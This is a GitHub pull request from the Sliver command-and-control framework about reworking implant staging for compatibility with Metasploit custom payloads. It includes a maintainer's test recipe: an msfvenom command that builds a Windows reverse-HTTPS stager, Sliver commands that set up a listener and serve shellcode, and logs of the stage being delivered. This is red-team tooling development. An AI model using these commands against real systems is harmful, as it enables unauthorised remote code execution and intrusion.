Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Reworked staging #889

Merged
merged 2 commits into from
Sep 19, 2022
Merged

Reworked staging #889

merged 2 commits into from
Sep 19, 2022

Conversation

rkervella
Copy link
Member

Modified the way staging works, adding a new flag prepend-size to stage-listener so we can be compatible with Metasploit's new custom payload types and staging protocol: https://www.rapid7.com/blog/post/2022/09/16/metasploit-weekly-wrap-up-176/.

We're now defaulting to custom/reverse_winhttp in the MsfStage RPC because it's the only one working at the moment (custom/reverse_http uses wininet on Windows, and doesn't seem to pick up the whole payload).

@rkervella rkervella requested a review from a team as a code owner September 19, 2022 18:43
moloch--
moloch-- previously approved these changes Sep 19, 2022
View reviewed changes
@rkervella rkervella merged commit 5a1f192 into master Sep 19, 2022
@bwatters-r7
Copy link

I apologize for commenting on a merged PR, but they should all work..... can you give me some steps to reproduce locally? Would you mind if I opened an issue here or on Framework's repo to track some testing and changes?

@moloch--
Copy link
Member

@bwatters-r7 @rkervella is out sick rn, but I'll get you a bug report/update as soon as i can.

@moloch--
Copy link
Member

@bwatters-r7 the bug was on our side

@rkervella
Copy link
Member Author

rkervella commented Sep 28, 2022
edited
Loading

@bwatters-r7 the bug was on our side

Well not totally, I just found a workaround. I never got custom/reverse_http or custom/reverse_https to work.
@bwatters-r7 My test case is basically the following:

# Generate the stager
 msfvenom -p windows/x64/custom/reverse_https LHOST=172.16.20.86 LPORT=1234 LURI=/hello.woff -f exe --o /tmp/stager.exe

# Start the stage listener
./sliver-server
[server] sliver > mtls
[server] sliver > profiles new --mtls 172.16.20.86 --debug --format shellcode win-shellcode
[*] Saved new implant profile win-shellcode
[server] sliver > stage-listener --profile win-shellcode --url https://172.16.20.86:1234 --prepend-size
[*] No builds found for profile win-shellcode, generating a new one
[*] Job 2 (https) started

# Check the sliver logs to see that we indeed received the request
cat $HOME/.sliver/logs/sliver.log
...
INFO[2022-09-28T13:30:38-07:00] [sliver/server/c2/http.go:450] 172.16.10.178:55356 - /hello.woff/wd9IOY-jQu9K1UvXKeHnHQkvsTyL0h-EOVBq5coZOLX -
INFO[2022-09-28T13:30:38-07:00] [sliver/server/c2/http.go:725] Received staging request from 172.16.10.178:55356
INFO[2022-09-28T13:30:40-07:00] [sliver/server/c2/http.go:727] Serving sliver shellcode (size 8602336) to 172.16.10.178:55356
...

I haven't spent time debugging the stager yet, but my observation is that the process dies after receiving the stage 2 shellcode ( the sliver shellcode). Things work fine with custom/reverse_winhttps though, which is our current workaround.

Let me know if you want us to open an issue on the metasploit-framework project or not.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@moloch-- moloch-- moloch-- approved these changes

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@rkervella @bwatters-r7 @moloch--